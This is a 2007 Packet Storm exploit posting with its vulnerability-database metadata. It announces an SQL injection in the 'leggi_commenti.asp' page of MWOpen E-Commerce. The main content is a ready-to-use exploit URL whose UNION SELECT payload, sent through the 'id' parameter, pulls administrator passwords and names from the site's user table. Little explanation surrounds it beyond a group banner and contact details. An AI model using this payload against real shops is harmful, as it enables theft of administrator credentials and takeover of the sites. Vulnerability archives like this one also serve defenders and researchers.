ID PACKETSTORM:61557
Type packetstorm
Reporter KiNgOfThEwOrLd
Modified 2007-12-07T00:00:00
Description
`---------------------------------------------------------------
____ __________ __ ____ __
/_ | ____ |__\_____ \ _____/ |_ /_ |/ |_
| |/ \ | | _(__ <_/ ___\ __\ ______ | \ __\
| | | \ | |/ \ \___| | /_____/ | || |
|___|___| /\__| /______ /\___ >__| |___||__|
\/\______| \/ \/
---------------------------------------------------------------
Http://www.inj3ct-it.org Staff[at]inj3ct-it[dot]org
---------------------------------------------------------------
MWOpen E-Commerce All Versions "leggi_commenti.asp" SQL Injection
---------------------------------------------------------------
#By KiNgOfThEwOrLd
---------------------------------------------------------------
PoC:
Nothing to say..
Corrupted Page:
leggi_commenti.asp
Corrupted Variabile:
?id=
Exploit:
http://[target]/[mwopen_path]/leggi_commenti.asp?id=9999+union+select+null,
null,password,nome,null,data,null+from+utenti+where+Admin=true
---------------------------------------------------------------
`
{"sourceHref": "https://packetstormsecurity.com/files/download/61557/mwopen-sql.txt", "sourceData": "`--------------------------------------------------------------- \n____ __________ __ ____ __ \n/_ | ____ |__\\_____ \\ _____/ |_ /_ |/ |_ \n| |/ \\ | | _(__ <_/ ___\\ __\\ ______ | \\ __\\ \n| | | \\ | |/ \\ \\___| | /_____/ | || | \n|___|___| /\\__| /______ /\\___ >__| |___||__| \n\\/\\______| \\/ \\/ \n--------------------------------------------------------------- \n \nHttp://www.inj3ct-it.org Staff[at]inj3ct-it[dot]org \n \n--------------------------------------------------------------- \n \nMWOpen E-Commerce All Versions \"leggi_commenti.asp\" SQL Injection \n \n--------------------------------------------------------------- \n \n#By KiNgOfThEwOrLd \n \n--------------------------------------------------------------- \n \nPoC: \n \nNothing to say.. \n \nCorrupted Page: \n \nleggi_commenti.asp \n \nCorrupted Variabile: \n \n?id= \n \nExploit: \n \nhttp://[target]/[mwopen_path]/leggi_commenti.asp?id=9999+union+select+null, \nnull,password,nome,null,data,null+from+utenti+where+Admin=true \n \n--------------------------------------------------------------- \n`\n", "edition": 1, "references": [], "modified": "2007-12-07T00:00:00", "hash": "c0ae3d8360fc9819015e9b0c9acc11115fa2163c840a30bad2911b2dda4c4665", "cvelist": [], "history": [], "bulletinFamily": "exploit", "href": "https://packetstormsecurity.com/files/61557/mwopen-sql.txt.html", "description": "", "id": "PACKETSTORM:61557", "reporter": "KiNgOfThEwOrLd", "lastseen": "2016-11-03T10:21:52", "published": "2007-12-07T00:00:00", "enchantments": {"score": {"value": 7.5, "vector": "NONE"}, "vulnersScore": 7.5}, "objectVersion": "1.2", "type": "packetstorm", "cvss": {"vector": "NONE", "score": 0.0}, "title": "mwopen-sql.txt", "viewCount": 0, "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "d4be9c4fc84262b4f39f89565918568f", "key": "cvss"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "description"}, {"hash": "c12836013228aaee3f2f684894ad6bf7", "key": "href"}, {"hash": "946b5b7df95be6a88e158bc1898b9a1f", "key": "modified"}, {"hash": "56765472680401499c79732468ba4340", "key": "objectVersion"}, {"hash": "946b5b7df95be6a88e158bc1898b9a1f", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "5e55980038680ec2bf1132ec9ae34eea", "key": "reporter"}, {"hash": "3558d30d326143b5f44f2c252064cdb0", "key": "sourceData"}, {"hash": "1e9a263b877471842233342e850f1d79", "key": "sourceHref"}, {"hash": "7b87ad4e6b16fa347b8b2435274e63a8", "key": "title"}, {"hash": "6466ca3735f647eeaed965d9e71bd35d", "key": "type"}]}
{}
